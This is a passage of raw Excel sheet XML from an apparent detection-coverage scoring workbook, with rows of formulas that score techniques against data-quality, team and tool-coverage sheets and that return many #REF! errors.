        <f>SUMPRODUCT(ISNUMBER(SEARCH(""&amp;'DataSource-Tool-Coverage'!A$2:A$45&amp;","," "&amp;'Detailed Techniques'!F100&amp;","))+0,'DataSource-Tool-Coverage'!#REF!)/(LEN(TRIM(F100))-LEN(SUBSTITUTE(TRIM(F100),",",""))+1)</f>
        <v>#REF!</v>
      </c>
      <c r="Q100" s="18" t="e">
        <f t="shared" si="11"/>
        <v>#REF!</v>
      </c>
      <c r="R100" s="20" t="e">
        <f>SUMPRODUCT(ISNUMBER(SEARCH(""&amp;'DataSource-Tool-Coverage'!A$2:A$45&amp;","," "&amp;'Detailed Techniques'!F100&amp;","))+0,'DataSource-Tool-Coverage'!#REF!)/(LEN(TRIM(F100))-LEN(SUBSTITUTE(TRIM(F100),",",""))+1)</f>
        <v>#REF!</v>
      </c>
      <c r="S100" s="18" t="e">
        <f t="shared" si="12"/>
        <v>#REF!</v>
      </c>
      <c r="T100" s="20" t="e">
        <f>SUMPRODUCT(ISNUMBER(SEARCH(""&amp;'DataSource-Tool-Coverage'!A$2:A$45&amp;","," "&amp;'Detailed Techniques'!F100&amp;","))+0,'DataSource-Tool-Coverage'!#REF!)/(LEN(TRIM(F100))-LEN(SUBSTITUTE(TRIM(F100),",",""))+1)</f>
        <v>#REF!</v>
      </c>
      <c r="U100" s="18" t="e">
        <f t="shared" si="13"/>
        <v>#REF!</v>
      </c>
      <c r="V100" s="20" t="e">
        <f>SUMPRODUCT(ISNUMBER(SEARCH(""&amp;'DataSource-Tool-Coverage'!A$2:A$45&amp;","," "&amp;'Detailed Techniques'!F100&amp;","))+0,'DataSource-Tool-Coverage'!#REF!)/(LEN(TRIM(F100))-LEN(SUBSTITUTE(TRIM(F100),",",""))+1)</f>
        <v>#REF!</v>
      </c>
      <c r="W100" s="18" t="e">
        <f t="shared" si="14"/>
        <v>#REF!</v>
      </c>
      <c r="X100" s="20" t="e">
        <f>SUMPRODUCT(ISNUMBER(SEARCH(""&amp;'DataSource-Tool-Coverage'!A$2:A$45&amp;","," "&amp;'Detailed Techniques'!F100&amp;","))+0,'DataSource-Tool-Coverage'!#REF!)/(LEN(TRIM(F100))-LEN(SUBSTITUTE(TRIM(F100),",",""))+1)</f>
        <v>#REF!</v>
      </c>
      <c r="Y100" s="18" t="e">
        <f t="shared" si="15"/>
        <v>#REF!</v>
      </c>
    </row>
    <row r="101" spans="1:25" ht="142.5" x14ac:dyDescent="0.45">
      <c r="A101" s="8" t="s">
        <v>178</v>
      </c>
      <c r="B101" s="8" t="s">
        <v>344</v>
      </c>
      <c r="C101" s="8" t="s">
        <v>677</v>
      </c>
      <c r="D101" s="10" t="s">
        <v>678</v>
      </c>
      <c r="E101" s="10" t="s">
        <v>679</v>
      </c>
      <c r="F101" s="10" t="s">
        <v>680</v>
      </c>
      <c r="G101" s="10" t="str">
        <f>INDEX('Score Defs'!A$3:A$8,MATCH('Detailed Techniques'!K101,'Score Defs'!B$3:B$8,0))</f>
        <v>None</v>
      </c>
      <c r="H101" s="51">
        <f>FLOOR(SUMPRODUCT(ISNUMBER(SEARCH(""&amp;'DataQuality-Scores'!A$3:A$59&amp;","," "&amp;'Detailed Techniques'!F101&amp;","))+0,'DataQuality-Scores'!B$3:B$59)/(LEN(TRIM(F101))-LEN(SUBSTITUTE(TRIM(F101),",",""))+1),1)</f>
        <v>0</v>
      </c>
      <c r="I101" s="51">
        <f>FLOOR(SUMPRODUCT(ISNUMBER(SEARCH(""&amp;'Team-Scores'!A$2:A$59&amp;","," "&amp;'Detailed Techniques'!F101&amp;","))+0,'Team-Scores'!F$2:F$59)/(LEN(TRIM(F101))-LEN(SUBSTITUTE(TRIM(F101),",",""))+1),1)</f>
        <v>0</v>
      </c>
      <c r="J101" s="51">
        <f>FLOOR(SUMPRODUCT(ISNUMBER(SEARCH(""&amp;'DataSource-Tool-Coverage'!A$2:A$59&amp;","," "&amp;'Detailed Techniques'!F101&amp;","))+0,'DataSource-Tool-Coverage'!P$2:P$59)/(LEN(TRIM(F101))-LEN(SUBSTITUTE(TRIM(F101),",",""))+1),1)</f>
        <v>0</v>
      </c>
      <c r="K101" s="51">
        <f t="shared" si="8"/>
        <v>0</v>
      </c>
      <c r="L101" s="20">
        <f>SUMPRODUCT(ISNUMBER(SEARCH(""&amp;'DataSource-Tool-Coverage'!A$2:A$45&amp;","," "&amp;'Detailed Techniques'!F101&amp;","))+0,'DataSource-Tool-Coverage'!$B$2:$B$45)/(LEN(TRIM(F101))-LEN(SUBSTITUTE(TRIM(F101),",",""))+1)</f>
        <v>0</v>
      </c>
      <c r="M101" s="18" t="str">
        <f t="shared" si="9"/>
        <v>0-20</v>
      </c>
      <c r="N101" s="20" t="e">
        <f>SUMPRODUCT(ISNUMBER(SEARCH(""&amp;'DataSource-Tool-Coverage'!A$2:A$45&amp;","," "&amp;'Detailed Techniques'!F101&amp;","))+0,'DataSource-Tool-Coverage'!#REF!)/(LEN(TRIM(F101))-LEN(SUBSTITUTE(TRIM(F101),",",""))+1)</f>
        <v>#REF!</v>
      </c>
      <c r="O101" s="18" t="e">
        <f t="shared" si="10"/>
        <v>#REF!</v>
      </c>
      <c r="P101" s="20" t="e">
        <f>SUMPRODUCT(ISNUMBER(SEARCH(""&amp;'DataSource-Tool-Coverage'!A$2:A$45&amp;","," "&amp;'Detailed Techniques'!F101&amp;","))+0,'DataSource-Tool-Coverage'!#REF!)/(LEN(TRIM(F101))-LEN(SUBSTITUTE(TRIM(F101),",",""))+1)</f>
        <v>#REF!</v>
      </c>
      <c r="Q101" s="18" t="e">
        <f t="shared" si="11"/>
        <v>#REF!</v>
      </c>
      <c r="R101" s="20" t="e">
        <f>SUMPRODUCT(ISNUMBER(SEARCH(""&amp;'DataSource-Tool-Coverage'!A$2:A$45&amp;","," "&amp;'Detailed Techniques'!F101&amp;","))+0,'DataSource-Tool-Coverage'!#REF!)/(LEN(TRIM(F101))-LEN(SUBSTITUTE(TRIM(F101),",",""))+1)</f>
        <v>#REF!</v>
      </c>
      <c r="S101" s="18" t="e">
        <f t="shared" si="12"/>
        <v>#REF!</v>
      </c>
      <c r="T101" s="20" t="e">
        <f>SUMPRODUCT(ISNUMBER(SEARCH(""&amp;'DataSource-Tool-Coverage'!A$2:A$45&amp;","," "&amp;'Detailed Techniques'!F101&amp;","))+0,'DataSource-Tool-Coverage'!#REF!)/(LEN(TRIM(F101))-LEN(SUBSTITUTE(TRIM(F101),",",""))+1)</f>
        <v>#REF!</v>
      </c>
      <c r="U101" s="18" t="e">
        <f t="shared" si="13"/>
        <v>#REF!</v>
      </c>
      <c r="V101" s="20" t="e">
        <f>SUMPRODUCT(ISNUMBER(SEARCH(""&amp;'DataSource-Tool-Coverage'!A$2:A$45&amp;","," "&amp;'Detailed Techniques'!F101&amp;","))+0,'DataSource-Tool-Coverage'!#REF!)/(LEN(TRIM(F101))-LEN(SUBSTITUTE(TRIM(F101),",",""))+1)</f>
        <v>#REF!</v>
      </c>
      <c r="W101" s="18" t="e">
        <f t="shared" si="14"/>
        <v>#REF!</v>
      </c>
      <c r="X101" s="20" t="e">
        <f>SUMPRODUCT(ISNUMBER(SEARCH(""&amp;'DataSource-Tool-Coverage'!A$2:A$45&amp;","," "&amp;'Detailed Techniques'!F101&amp;","))+0,'DataSource-Tool-Coverage'!#REF!)/(LEN(TRIM(F101))-LEN(SUBSTITUTE(TRIM(F101),",",""))+1)</f>
        <v>#REF!</v>
      </c>
      <c r="Y101" s="18" t="e">
        <f t="shared" si="15"/>
        <v>#REF!</v>
      </c>
    </row>
    <row r="102" spans="1:25" ht="128.25" x14ac:dyDescent="0.45">
      <c r="A102" s="8" t="s">
        <v>210</v>
      </c>
      <c r="B102" s="8" t="s">
        <v>0</v>
      </c>
      <c r="C102" s="8" t="s">
        <v>681</v>
      </c>
      <c r="D102" s="10" t="s">
        <v>682</v>
      </c>
      <c r="E102" s="10" t="s">
        <v>683</v>
      </c>
      <c r="F102" s="10" t="s">
        <v>684</v>
      </c>
      <c r="G102" s="10" t="str">
        <f>INDEX('Score Defs'!A$3:A$8,MATCH('Detailed Techniques'!K102,'Score Defs'!B$3:B$8,0))</f>
        <v>None</v>
      </c>
      <c r="H102" s="51">
        <f>FLOOR(SUMPRODUCT(ISNUMBER(SEARCH(""&amp;'DataQuality-Scores'!A$3:A$59&amp;","," "&amp;'Detailed Techniques'!F102&amp;","))+0,'DataQuality-Scores'!B$3:B$59)/(LEN(TRIM(F102))-LEN(SUBSTITUTE(TRIM(F102),",",""))+1),1)</f>
        <v>0</v>
      </c>
      <c r="I102" s="51">
        <f>FLOOR(SUMPRODUCT(ISNUMBER(SEARCH(""&amp;'Team-Scores'!A$2:A$59&amp;","," "&amp;'Detailed Techniques'!F102&amp;","))+0,'Team-Scores'!F$2:F$59)/(LEN(TRIM(F102))-LEN(SUBSTITUTE(TRIM(F102),",",""))+1),1)</f>
        <v>0</v>
      </c>
      <c r="J102" s="51">
        <f>FLOOR(SUMPRODUCT(ISNUMBER(SEARCH(""&amp;'DataSource-Tool-Coverage'!A$2:A$59&amp;","," "&amp;'Detailed Techniques'!F102&amp;","))+0,'DataSource-Tool-Coverage'!P$2:P$59)/(LEN(TRIM(F102))-LEN(SUBSTITUTE(TRIM(F102),",",""))+1),1)</f>
        <v>0</v>
      </c>
      <c r="K102" s="51">
        <f t="shared" si="8"/>
        <v>0</v>
      </c>
      <c r="L102" s="20">
        <f>SUMPRODUCT(ISNUMBER(SEARCH(""&amp;'DataSource-Tool-Coverage'!A$2:A$45&amp;","," "&amp;'Detailed Techniques'!F102&amp;","))+0,'DataSource-Tool-Coverage'!$B$2:$B$45)/(LEN(TRIM(F102))-LEN(SUBSTITUTE(TRIM(F102),",",""))+1)</f>
        <v>0</v>
      </c>
      <c r="M102" s="18" t="str">
        <f t="shared" si="9"/>
        <v>0-20</v>
      </c>
      <c r="N102" s="20" t="e">
        <f>SUMPRODUCT(ISNUMBER(SEARCH(""&amp;'DataSource-Tool-Coverage'!A$2:A$45&amp;","," "&amp;'Detailed Techniques'!F102&amp;","))+0,'DataSource-Tool-Coverage'!#REF!)/(LEN(TRIM(F102))-LEN(SUBSTITUTE(TRIM(F102),",",""))+1)</f>
        <v>#REF!</v>
      </c>
      <c r="O102" s="18" t="e">
        <f t="shared" si="10"/>
        <v>#REF!</v>
      </c>
      <c r="P102" s="20" t="e">
        <f>SUMPRODUCT(ISNUMBER(SEARCH(""&amp;'DataSource-Tool-Coverage'!A$2:A$45&amp;","," "&amp;'Detailed Techniques'!F102&amp;","))+0,'DataSource-Tool-Coverage'!#REF!)/(LEN(TRIM(F102))-LEN(SUBSTITUTE(TRIM(F102),",",""))+1)</f>
        <v>#REF!</v>
      </c>
      <c r="Q102" s="18" t="e">
        <f t="shared" si="11"/>
        <v>#REF!</v>
      </c>
      <c r="R102" s="20" t="e">
        <f>SUMPRODUCT(ISNUMBER(SEARCH(""&amp;'DataSource-Tool-Coverage'!A$2:A$45&amp;","," "&amp;'Detailed Techniques'!F102&amp;","))+0,'DataSource-Tool-Coverage'!#REF!)/(LEN(TRIM(F102))-LEN(SUBSTITUTE(TRIM(F102),",",""))+1)</f>
        <v>#REF!</v>
      </c>
      <c r="S102" s="18" t="e">
        <f t="shared" si="12"/>
        <v>#REF!</v>
      </c>
      <c r="T102" s="20" t="e">
        <f>SUMPRODUCT(ISNUMBER(SEARCH(""&amp;'DataSource-Tool-Coverage'!A$2:A$45&amp;","," "&amp;'Detailed Techniques'!F102&amp;","))+0,'DataSource-Tool-Coverage'!#REF!)/(LEN(TRIM(F102))-LEN(SUBSTITUTE(TRIM(F102),",",""))+1)</f>
        <v>#REF!</v>
      </c>
      <c r="U102" s="18" t="e">
        <f t="shared" si="13"/>
        <v>#REF!</v>
      </c>
      <c r="V102" s="20" t="e">
        <f>SUMPRODUCT(ISNUMBER(SEARCH(""&amp;'DataSource-Tool-Coverage'!A$2:A$45&amp;","," "&amp;'Detailed Techniques'!F102&amp;","))+0,'DataSource-Tool-Coverage'!#REF!)/(LEN(TRIM(F102))-LEN(SUBSTITUTE(TRIM(F102),",",""))+1)</f>
        <v>#REF!</v>
      </c>
      <c r="W102" s="18" t="e">
        <f t="shared" si="14"/>
        <v>#REF!</v>
      </c>
      <c r="X102" s="20" t="e">
        <f>SUMPRODUCT(ISNUMBER(SEARCH(""&amp;'DataSource-Tool-Coverage'!A$2:A$45&amp;","," "&amp;'Detailed Techniques'!F102&amp;","))+0,'DataSource-Tool-Coverage'!#REF!)/(LEN(TRIM(F102))-LEN(SUBSTITUTE(TRIM(F102),",",""))+1)</f>
        <v>#REF!</v>
      </c>
      <c r="Y102" s="18" t="e">
        <f t="shared" si="15"/>
        <v>#REF!</v>
      </c>
    </row>
    <row r="103" spans="1:25" ht="142.5" x14ac:dyDescent="0.45">
      <c r="A103" s="8" t="s">
        <v>154</v>
      </c>
      <c r="B103" s="8" t="s">
        <v>9</v>
      </c>
      <c r="C103" s="8" t="s">
        <v>685</v>
      </c>
      <c r="D103" s="10" t="s">
        <v>686</v>
      </c>
      <c r="E103" s="10" t="s">
        <v>687</v>
      </c>
      <c r="F103" s="10" t="s">
        <v>688</v>
      </c>
      <c r="G103" s="10" t="str">
        <f>INDEX('Score Defs'!A$3:A$8,MATCH('Detailed Techniques'!K103,'Score Defs'!B$3:B$8,0))</f>
        <v>None</v>
      </c>
      <c r="H103" s="51">
        <f>FLOOR(SUMPRODUCT(ISNUMBER(SEARCH(""&amp;'DataQuality-Scores'!A$3:A$59&amp;","," "&amp;'Detailed Techniques'!F103&amp;","))+0,'DataQuality-Scores'!B$3:B$59)/(LEN(TRIM(F103))-LEN(SUBSTITUTE(TRIM(F103),",",""))+1),1)</f>
        <v>0</v>
      </c>
      <c r="I103" s="51">
        <f>FLOOR(SUMPRODUCT(ISNUMBER(SEARCH(""&amp;'Team-Scores'!A$2:A$59&amp;","," "&amp;'Detailed Techniques'!F103&amp;","))+0,'Team-Scores'!F$2:F$59)/(LEN(TRIM(F103))-LEN(SUBSTITUTE(TRIM(F103),",",""))+1),1)</f>
        <v>0</v>
      </c>
      <c r="J103" s="51">
        <f>FLOOR(SUMPRODUCT(ISNUMBER(SEARCH(""&amp;'DataSource-Tool-Coverage'!A$2:A$59&amp;","," "&amp;'Detailed Techniques'!F103&amp;","))+0,'DataSource-Tool-Coverage'!P$2:P$59)/(LEN(TRIM(F103))-LEN(SUBSTITUTE(TRIM(F103),",",""))+1),1)</f>
        <v>0</v>
      </c>
      <c r="K103" s="51">
        <f t="shared" si="8"/>
        <v>0</v>
      </c>
      <c r="L103" s="20">
        <f>SUMPRODUCT(ISNUMBER(SEARCH(""&amp;'DataSource-Tool-Coverage'!A$2:A$45&amp;","," "&amp;'Detailed Techniques'!F103&amp;","))+0,'DataSource-Tool-Coverage'!$B$2:$B$45)/(LEN(TRIM(F103))-LEN(SUBSTITUTE(TRIM(F103),",",""))+1)</f>
        <v>0</v>
      </c>
      <c r="M103" s="18" t="str">
        <f t="shared" si="9"/>
        <v>0-20</v>
      </c>
      <c r="N103" s="20" t="e">
        <f>SUMPRODUCT(ISNUMBER(SEARCH(""&amp;'DataSource-Tool-Coverage'!A$2:A$45&amp;","," "&amp;'Detailed Techniques'!F103&amp;","))+0,'DataSource-Tool-Coverage'!#REF!)/(LEN(TRIM(F103))-LEN(SUBSTITUTE(TRIM(F103),",",""))+1)</f>
        <v>#REF!</v>
      </c>
      <c r="O103" s="18" t="e">
        <f t="shared" si="10"/>
        <v>#REF!</v>
      </c>
      <c r="P103" s="20" t="e">
        <f>SUMPRODUCT(ISNUMBER(SEARCH(""&amp;'DataSource-Tool-Coverage'!A$2:A$45&amp;","," "&amp;'Detailed Techniques'!F103&amp;","))+0,'DataSource-Tool-Coverage'!#REF!)/(LEN(TRIM(F103))-LEN(SUBSTITUTE(TRIM(F103),",",""))+1)</f>
        <v>#REF!</v>
      </c>
      <c r="Q103" s="18" t="e">
        <f t="shared" si="11"/>
        <v>#REF!</v>
      </c>
      <c r="R103" s="20" t="e">
        <f>SUMPRODUCT(ISNUMBER(SEARCH(""&amp;'DataSource-Tool-Coverage'!A$2:A$45&amp;","," "&amp;'Detailed Techniques'!F103&amp;","))+0,'DataSource-Tool-Coverage'!#REF!)/(LEN(TRIM(F103))-LEN(SUBSTITUTE(TRIM(F103),",",""))+1)</f>
        <v>#REF!</v>
      </c>
      <c r="S103" s="18" t="e">
        <f t="shared" si="12"/>
        <v>#REF!</v>
      </c>
      <c r="T103" s="20" t="e">
        <f>SUMPRODUCT(ISNUMBER(SEARCH(""&amp;'DataSource-Tool-Coverage'!A$2:A$45&amp;","," "&amp;'Detailed Techniques'!F103&amp;","))+0,'DataSource-Tool-Coverage'!#REF!)/(LEN(TRIM(F103))-LEN(SUBSTITUTE(TRIM(F103),",",""))+1)</f>
        <v>#REF!</v>
      </c>
      <c r="U103" s="18" t="e">
        <f t="shared" si="13"/>
        <v>#REF!</v>
      </c>
      <c r="V103" s="20" t="e">
        <f>SUMPRODUCT(ISNUMBER(SEARCH(""&amp;'DataSource-Tool-Coverage'!A$2:A$45&amp;","," "&amp;'Detailed Techniques'!F103&amp;","))+0,'DataSource-Tool-Coverage'!#REF!)/(LEN(TRIM(F103))-LEN(SUBSTITUTE(TRIM(F103),",",""))+1)</f>
        <v>#REF!</v>
      </c>
      <c r="W103" s="18" t="e">
        <f t="shared" si="14"/>
        <v>#REF!</v>
      </c>
      <c r="X103" s="20" t="e">
        <f>SUMPRODUCT(ISNUMBER(SEARCH(""&amp;'DataSource-Tool-Coverage'!A$2:A$45&amp;","," "&amp;'Detailed Techniques'!F103&amp;","))+0,'DataSource-Tool-Coverage'!#REF!)/(LEN(TRIM(F103))-LEN(SUBSTITUTE(TRIM(F103),",",""))+1)</f>
        <v>#REF!</v>
      </c>
      <c r="Y103" s="18" t="e">
        <f t="shared" si="15"/>
        <v>#REF!</v>
      </c>
    </row>
    <row r="104" spans="1:25" ht="213.75" x14ac:dyDescent="0.45">
      <c r="A104" s="8" t="s">
        <v>30</v>
      </c>
      <c r="B104" s="8" t="s">
        <v>344</v>
      </c>
      <c r="C104" s="8" t="s">
        <v>689</v>
      </c>
      <c r="D104" s="10" t="s">
        <v>690</v>
      </c>
      <c r="E104" s="10" t="s">
        <v>691</v>
      </c>
      <c r="F104" s="10" t="s">
        <v>692</v>
      </c>
      <c r="G104" s="10" t="str">
        <f>INDEX('Score Defs'!A$3:A$8,MATCH('Detailed Techniques'!K104,'Score Defs'!B$3:B$8,0))</f>
        <v>None</v>
      </c>
      <c r="H104" s="51">
        <f>FLOOR(SUMPRODUCT(ISNUMBER(SEARCH(""&amp;'DataQuality-Scores'!A$3:A$59&amp;","," "&amp;'Detailed Techniques'!F104&amp;","))+0,'DataQuality-Scores'!B$3:B$59)/(LEN(TRIM(F104))-LEN(SUBSTITUTE(TRIM(F104),",",""))+1),1)</f>
        <v>0</v>
      </c>
      <c r="I104" s="51">
        <f>FLOOR(SUMPRODUCT(ISNUMBER(SEARCH(""&amp;'Team-Scores'!A$2:A$59&amp;","," "&amp;'Detailed Techniques'!F104&amp;","))+0,'Team-Scores'!F$2:F$59)/(LEN(TRIM(F104))-LEN(SUBSTITUTE(TRIM(F104),",",""))+1),1)</f>
        <v>0</v>
      </c>
      <c r="J104" s="51">
        <f>FLOOR(SUMPRODUCT(ISNUMBER(SEARCH(""&amp;'DataSource-Tool-Coverage'!A$2:A$59&amp;","," "&amp;'Detailed Techniques'!F104&amp;","))+0,'DataSource-Tool-Coverage'!P$2:P$59)/(LEN(TRIM(F104))-LEN(SUBSTITUTE(TRIM(F104),",",""))+1),1)</f>
        <v>0</v>
      </c>
      <c r="K104" s="51">
        <f t="shared" si="8"/>
        <v>0</v>
      </c>
      <c r="L104" s="20">
        <f>SUMPRODUCT(ISNUMBER(SEARCH(""&amp;'DataSource-Tool-Coverage'!A$2:A$45&amp;","," "&amp;'Detailed Techniques'!F104&amp;","))+0,'DataSource-Tool-Coverage'!$B$2:$B$45)/(LEN(TRIM(F104))-LEN(SUBSTITUTE(TRIM(F104),",",""))+1)</f>
        <v>0</v>
      </c>
      <c r="M104" s="18" t="str">
        <f t="shared" si="9"/>
        <v>0-20</v>
      </c>
      <c r="N104" s="20" t="e">
        <f>SUMPRODUCT(ISNUMBER(SEARCH(""&amp;'DataSource-Tool-Coverage'!A$2:A$45&amp;","," "&amp;'Detailed Techniques'!F104&amp;","))+0,'DataSource-Tool-Coverage'!#REF!)/(LEN(TRIM(F104))-LEN(SUBSTITUTE(TRIM(F104),",",""))+1)</f>
        <v>#REF!</v>
      </c>
      <c r="O104" s="18" t="e">
        <f t="shared" si="10"/>
        <v>#REF!</v>
      </c>
      <c r="P104" s="20" t="e">
        <f>SUMPRODUCT(ISNUMBER(SEARCH(""&amp;'DataSource-Tool-Coverage'!A$2:A$45&amp;","," "&amp;'Detailed Techniques'!F104&amp;","))+0,'DataSource-Tool-Coverage'!#REF!)/(LEN(TRIM(F104))-LEN(SUBSTITUTE(TRIM(F104),",",""))+1)</f>
        <v>#REF!</v>
      </c>
      <c r="Q104" s="18" t="e">
        <f t="shared" si="11"/>
        <v>#REF!</v>
      </c>
      <c r="R104" s="20" t="e">
        <f>SUMPRODUCT(ISNUMBER(SEARCH(""&amp;'DataSource-Tool-Coverage'!A$2:A$45&amp;","," "&amp;'Detailed Techniques'!F104&amp;","))+0,'DataSource-Tool-Coverage'!#REF!)/(LEN(TRIM(F104))-LEN(SUBSTITUTE(TRIM(F104),",",""))+1)</f>
        <v>#REF!</v>
      </c>
      <c r="S104" s="18" t="e">
        <f t="shared" si="12"/>
        <v>#REF!</v>
      </c>
      <c r="T104" s="20" t="e">
        <f>SUMPRODUCT(ISNUMBER(SEARCH(""&amp;'DataSource-Tool-Coverage'!A$2:A$45&amp;","," "&amp;'Detailed Techniques'!F104&amp;","))+0,'DataSource-Tool-Coverage'!#REF!)/(LEN(TRIM(F104))-LEN(SUBSTITUTE(TRIM(F104),",",""))+1)</f>
        <v>#REF!</v>
      </c>
      <c r="U104" s="18" t="e">
        <f t="shared" si="13"/>
        <v>#REF!</v>
      </c>
      <c r="V104" s="20" t="e">
        <f>SUMPRODUCT(ISNUMBER(SEARCH(""&amp;'DataSource-Tool-Coverage'!A$2:A$45&amp;","," "&amp;'Detailed Techniques'!F104&amp;","))+0,'DataSource-Tool-Coverage'!#REF!)/(LEN(TRIM(F104))-LEN(SUBSTITUTE(TRIM(F104),",",""))+1)</f>
        <v>#REF!</v>
      </c>
      <c r="W104" s="18" t="e">
        <f t="shared" si="14"/>
        <v>#REF!</v>
      </c>
      <c r="X104" s="20" t="e">
        <f>SUMPRODUCT(ISNUMBER(SEARCH(""&amp;'DataSource-Tool-Coverage'!A$2:A$45&amp;","," "&amp;'Detailed Techniques'!F104&amp;","))+0,'DataSource-Tool-Coverage'!#REF!)/(LEN(TRIM(F104))-LEN(SUBSTITUTE(TRIM(F104),",",""))+1)</f>
        <v>#REF!</v>
      </c>
      <c r="Y104" s="18" t="e">
        <f t="shared" si="15"/>
        <v>#REF!</v>
      </c>
    </row>
    <row r="105" spans="1:25" ht="185.25" x14ac:dyDescent="0.45">
      <c r="A105" s="8" t="s">
        <v>111</v>
      </c>
      <c r="B105" s="8" t="s">
        <v>9</v>
      </c>
      <c r="C105" s="8" t="s">
        <v>693</v>
      </c>
      <c r="D105" s="10" t="s">
        <v>694</v>
      </c>
      <c r="E105" s="10" t="s">
        <v>695</v>
      </c>
      <c r="F105" s="10" t="s">
        <v>696</v>
      </c>
      <c r="G105" s="10" t="str">
        <f>INDEX('Score Defs'!A$3:A$8,MATCH('Detailed Techniques'!K105,'Score Defs'!B$3:B$8,0))</f>
        <v>None</v>
      </c>
      <c r="H105" s="51">
        <f>FLOOR(SUMPRODUCT(ISNUMBER(SEARCH(""&amp;'DataQuality-Scores'!A$3:A$59&amp;","," "&amp;'Detailed Techniques'!F105&amp;","))+0,'DataQuality-Scores'!B$3:B$59)/(LEN(TRIM(F105))-LEN(SUBSTITUTE(TRIM(F105),",",""))+1),1)</f>
        <v>0</v>
      </c>
      <c r="I105" s="51">
        <f>FLOOR(SUMPRODUCT(ISNUMBER(SEARCH(""&amp;'Team-Scores'!A$2:A$59&amp;","," "&amp;'Detailed Techniques'!F105&amp;","))+0,'Team-Scores'!F$2:F$59)/(LEN(TRIM(F105))-LEN(SUBSTITUTE(TRIM(F105),",",""))+1),1)</f>
        <v>0</v>
      </c>
      <c r="J105" s="51">
        <f>FLOOR(SUMPRODUCT(ISNUMBER(SEARCH(""&amp;'DataSource-Tool-Coverage'!A$2:A$59&amp;","," "&amp;'Detailed Techniques'!F105&amp;","))+0,'DataSource-Tool-Coverage'!P$2:P$59)/(LEN(TRIM(F105))-LEN(SUBSTITUTE(TRIM(F105),",",""))+1),1)</f>
        <v>0</v>
      </c>
      <c r="K105" s="51">
        <f t="shared" si="8"/>
        <v>0</v>
      </c>
      <c r="L105" s="20">
        <f>SUMPRODUCT(ISNUMBER(SEARCH(""&amp;'DataSource-Tool-Coverage'!A$2:A$45&amp;","," "&amp;'Detailed Techniques'!F105&amp;","))+0,'DataSource-Tool-Coverage'!$B$2:$B$45)/(LEN(TRIM(F105))-LEN(SUBSTITUTE(TRIM(F105),",",""))+1)</f>
        <v>0</v>
      </c>
      <c r="M105" s="18" t="str">
        <f t="shared" si="9"/>
        <v>0-20</v>
      </c>
      <c r="N105" s="20" t="e">
        <f>SUMPRODUCT(ISNUMBER(SEARCH(""&amp;'DataSource-Tool-Coverage'!A$2:A$45&amp;","," "&amp;'Detailed Techniques'!F105&amp;","))+0,'DataSource-Tool-Coverage'!#REF!)/(LEN(TRIM(F105))-LEN(SUBSTITUTE(TRIM(F105),",",""))+1)</f>
        <v>#REF!</v>
      </c>
      <c r="O105" s="18" t="e">
        <f t="shared" si="10"/>
        <v>#REF!</v>
      </c>
      <c r="P105" s="20" t="e">
        <f>SUMPRODUCT(ISNUMBER(SEARCH(""&amp;'DataSource-Tool-Coverage'!A$2:A$45&amp;","," "&amp;'Detailed Techniques'!F105&amp;","))+0,'DataSource-Tool-Coverage'!#REF!)/(LEN(TRIM(F105))-LEN(SUBSTITUTE(TRIM(F105),",",""))+1)</f>
        <v>#REF!</v>
      </c>
      <c r="Q105" s="18" t="e">
        <f t="shared" si="11"/>
        <v>#REF!</v>
      </c>
      <c r="R105" s="20" t="e">
        <f>SUMPRODUCT(ISNUMBER(SEARCH(""&amp;'DataSource-Tool-Coverage'!A$2:A$45&amp;","," "&amp;'Detailed Techniques'!F105&amp;","))+0,'DataSource-Tool-Coverage'!#REF!)/(LEN(TRIM(F105))-LEN(SUBSTITUTE(TRIM(F105),",",""))+1)</f>
        <v>#REF!</v>
      </c>
      <c r="S105" s="18" t="e">
        <f t="shared" si="12"/>
        <v>#REF!</v>
      </c>
      <c r="T105" s="20" t="e">
        <f>SUMPRODUCT(ISNUMBER(SEARCH(""&amp;'DataSource-Tool-Coverage'!A$2:A$45&amp;","," "&amp;'Detailed Techniques'!F105&amp;","))+0,'DataSource-Tool-Coverage'!#REF!)/(LEN(TRIM(F105))-LEN(SUBSTITUTE(TRIM(F105),",",""))+1)</f>
        <v>#REF!</v>
      </c>
      <c r="U105" s="18" t="e">
        <f t="shared" si="13"/>
        <v>#REF!</v>
      </c>
      <c r="V105" s="20" t="e">
        <f>SUMPRODUCT(ISNUMBER(SEARCH(""&amp;'DataSource-Tool-Coverage'!A$2:A$45&amp;","," "&amp;'Detailed Techniques'!F105&amp;","))+0,'DataSource-Tool-Coverage'!#REF!)/(LEN(TRIM(F105))-LEN(SUBSTITUTE(TRIM(F105),",",""))+1)</f>
        <v>#REF!</v>
      </c>
      <c r="W105" s="18" t="e">
        <f t="shared" si="14"/>
        <v>#REF!</v>
      </c>
      <c r="X105" s="20" t="e">
        <f>SUMPRODUCT(ISNUMBER(SEARCH(""&amp;'DataSource-Tool-Coverage'!A$2:A$45&amp;","," "&amp;'Detailed Techniques'!F105&amp;","))+0,'DataSource-Tool-Coverage'!#REF!)/(LEN(TRIM(F105))-LEN(SUBSTITUTE(TRIM(F105),",",""))+1)</f>
        <v>#REF!</v>
      </c>
      <c r="Y105" s="18" t="e">
        <f t="shared" si="15"/>
        <v>#REF!</v>
      </c>
    </row>
    <row r="106" spans="1:25" ht="156.75" x14ac:dyDescent="0.45">
      <c r="A106" s="8" t="s">
        <v>84</v>
      </c>
      <c r="B106" s="8" t="s">
        <v>697</v>
      </c>
      <c r="C106" s="8" t="s">
        <v>698</v>
      </c>
      <c r="D106" s="10" t="s">
        <v>699</v>
      </c>
      <c r="E106" s="10" t="s">
        <v>700</v>
      </c>
      <c r="F106" s="10" t="s">
        <v>701</v>
      </c>
      <c r="G106" s="10" t="str">
        <f>INDEX('Score Defs'!A$3:A$8,MATCH('Detailed Techniques'!K106,'Score Defs'!B$3:B$8,0))</f>
        <v>None</v>
      </c>
      <c r="H106" s="51">
        <f>FLOOR(SUMPRODUCT(ISNUMBER(SEARCH(""&amp;'DataQuality-Scores'!A$3:A$59&amp;","," "&amp;'Detailed Techniques'!F106&amp;","))+0,'DataQuality-Scores'!B$3:B$59)/(LEN(TRIM(F106))-LEN(SUBSTITUTE(TRIM(F106),",",""))+1),1)</f>
        <v>0</v>
      </c>
      <c r="I106" s="51">
        <f>FLOOR(SUMPRODUCT(ISNUMBER(SEARCH(""&amp;'Team-Scores'!A$2:A$59&amp;","," "&amp;'Detailed Techniques'!F106&amp;","))+0,'Team-Scores'!F$2:F$59)/(LEN(TRIM(F106))-LEN(SUBSTITUTE(TRIM(F106),",",""))+1),1)</f>
        <v>0</v>
      </c>
      <c r="J106" s="51">
